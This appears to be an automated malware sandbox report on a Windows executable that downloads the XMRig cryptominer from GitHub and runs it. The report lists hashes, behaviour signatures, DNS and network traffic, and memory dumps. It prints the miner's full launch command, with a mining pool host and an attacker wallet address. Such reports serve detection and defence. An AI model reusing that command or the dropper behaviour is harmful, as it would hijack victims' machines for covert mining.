Resubmissions

06/07/2024, 19:03 UTC

240706-xqksaazhrm 10

21/06/2024, 07:08 UTC

240621-hyl8razgpc 10

16/06/2024, 18:48 UTC

240616-xf5ppswgmq 10

16/06/2024, 18:34 UTC

240616-w759wasbqf 10

16/06/2024, 18:21 UTC

240616-wzje5swajj 10

16/06/2024, 18:08 UTC

240616-wqxams1ekf 10

16/06/2024, 17:54 UTC

240616-whbzqsvcrn 10

16/06/2024, 17:41 UTC

240616-v9q3aszhkf 10

16/06/2024, 17:28 UTC

240616-v1237szgpc 10

Analysis

  • max time kernel
    144s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/07/2024, 19:03 UTC

General

  • Target

    main - Copy (4) - Copy.exe

  • Size

    6.9MB

  • MD5

    22c978ffaefef3389bf29068b9621661

  • SHA1

    5671972c1d70826fb85dced4c83c700dd282ea21

  • SHA256

    e6ee8e9b38e10a92a89e61b8655ca4fedcc381fd93cb36f43fe323132923dfcf

  • SHA512

    8a280cb782f0afab171d2e7955b75362e98cefd449d382004ef2568c2c230cd633a754b1dd5f0dc5e17407819e4dceb5b0cbb2647e279a6ec674b8d9484be26a

  • SSDEEP

    98304:7b5Ak7khMiyw0VREqfnle5EEPbxVhCQHSIMf:5LUMiywZqshDxaQHh

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 16 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
    "C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4672
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
      xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4452
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3708,i,13421008738336098502,1902686380018635081,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:8
    1⤵
      PID:4884

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      133.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      github.com
      main - Copy (4) - Copy.exe
      Remote address:
      8.8.8.8:53
      Request
      github.com
      IN A
      Response
      github.com
      IN A
      20.26.156.215
    • flag-us
      DNS
      objects.githubusercontent.com
      main - Copy (4) - Copy.exe
      Remote address:
      8.8.8.8:53
      Request
      objects.githubusercontent.com
      IN A
      Response
      objects.githubusercontent.com
      IN A
      185.199.111.133
      objects.githubusercontent.com
      IN A
      185.199.108.133
      objects.githubusercontent.com
      IN A
      185.199.109.133
      objects.githubusercontent.com
      IN A
      185.199.110.133
    • flag-us
      DNS
      240.221.184.93.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.221.184.93.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      26.35.223.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.35.223.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      215.156.26.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      215.156.26.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.111.199.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.111.199.185.in-addr.arpa
      IN PTR
      Response
      133.111.199.185.in-addr.arpa
      IN PTR
      cdn-185-199-111-133githubcom
    • flag-us
      DNS
      pool.hashvault.pro
      xmrig.exe
      Remote address:
      8.8.8.8:53
      Request
      pool.hashvault.pro
      IN A
      Response
      pool.hashvault.pro
      IN A
      45.76.89.70
      pool.hashvault.pro
      IN A
      95.179.241.203
    • flag-us
      DNS
      203.241.179.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      203.241.179.95.in-addr.arpa
      IN PTR
      Response
      203.241.179.95.in-addr.arpa
      IN PTR
      95179241203vultrusercontentcom
    • flag-us
      DNS
      26.165.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      26.165.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      206.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      192.142.123.92.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      192.142.123.92.in-addr.arpa
      IN PTR
      Response
      192.142.123.92.in-addr.arpa
      IN PTR
      a92-123-142-192deploystaticakamaitechnologiescom
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 20.26.156.215:443
      github.com
      tls
      main - Copy (4) - Copy.exe
      1.6kB
      8.5kB
      21
      18
    • 185.199.111.133:443
      objects.githubusercontent.com
      tls
      main - Copy (4) - Copy.exe
      131.6kB
      3.5MB
      2615
      2624
    • 95.179.241.203:80
      pool.hashvault.pro
      tls
      xmrig.exe
      3.8kB
      8.7kB
      26
      25
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      133.32.126.40.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      133.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      github.com
      dns
      main - Copy (4) - Copy.exe
      56 B
      72 B
      1
      1

      DNS Request

      github.com

      DNS Response

      20.26.156.215

    • 8.8.8.8:53
      objects.githubusercontent.com
      dns
      main - Copy (4) - Copy.exe
      75 B
      139 B
      1
      1

      DNS Request

      objects.githubusercontent.com

      DNS Response

      185.199.111.133
      185.199.108.133
      185.199.109.133
      185.199.110.133

    • 8.8.8.8:53
      240.221.184.93.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      240.221.184.93.in-addr.arpa

    • 8.8.8.8:53
      26.35.223.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      26.35.223.20.in-addr.arpa

    • 8.8.8.8:53
      215.156.26.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      215.156.26.20.in-addr.arpa

    • 8.8.8.8:53
      133.111.199.185.in-addr.arpa
      dns
      74 B
      118 B
      1
      1

      DNS Request

      133.111.199.185.in-addr.arpa

    • 8.8.8.8:53
      pool.hashvault.pro
      dns
      xmrig.exe
      64 B
      96 B
      1
      1

      DNS Request

      pool.hashvault.pro

      DNS Response

      45.76.89.70
      95.179.241.203

    • 8.8.8.8:53
      203.241.179.95.in-addr.arpa
      dns
      73 B
      122 B
      1
      1

      DNS Request

      203.241.179.95.in-addr.arpa

    • 8.8.8.8:53
      26.165.165.52.in-addr.arpa
      dns
      72 B
      146 B
      1
      1

      DNS Request

      26.165.165.52.in-addr.arpa

    • 8.8.8.8:53
      206.23.85.13.in-addr.arpa
      dns
      71 B
      145 B
      1
      1

      DNS Request

      206.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      192.142.123.92.in-addr.arpa
      dns
      73 B
      139 B
      1
      1

      DNS Request

      192.142.123.92.in-addr.arpa

    • 8.8.8.8:53
      29.243.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      29.243.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

      Filesize

      7.9MB

      MD5

      e2fe87cc2c7dab8ca6516620dccd1381

      SHA1

      f714ec0448325435103519452610cf7aadf8bbba

      SHA256

      d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4

      SHA512

      8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

    • memory/4452-14-0x0000023063B40000-0x0000023063B60000-memory.dmp

      Filesize

      128KB

    • memory/4452-15-0x0000023063C90000-0x0000023063CB0000-memory.dmp

      Filesize

      128KB

    • memory/4452-16-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-18-0x0000023063CD0000-0x0000023063CF0000-memory.dmp

      Filesize

      128KB

    • memory/4452-17-0x0000023063CB0000-0x0000023063CD0000-memory.dmp

      Filesize

      128KB

    • memory/4452-19-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-20-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-23-0x0000023063CD0000-0x0000023063CF0000-memory.dmp

      Filesize

      128KB

    • memory/4452-22-0x0000023063CB0000-0x0000023063CD0000-memory.dmp

      Filesize

      128KB

    • memory/4452-21-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-24-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-25-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-26-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-27-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-28-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-29-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-30-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-31-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-32-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    • memory/4452-33-0x00007FF67DB40000-0x00007FF67E643000-memory.dmp

      Filesize

      11.0MB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.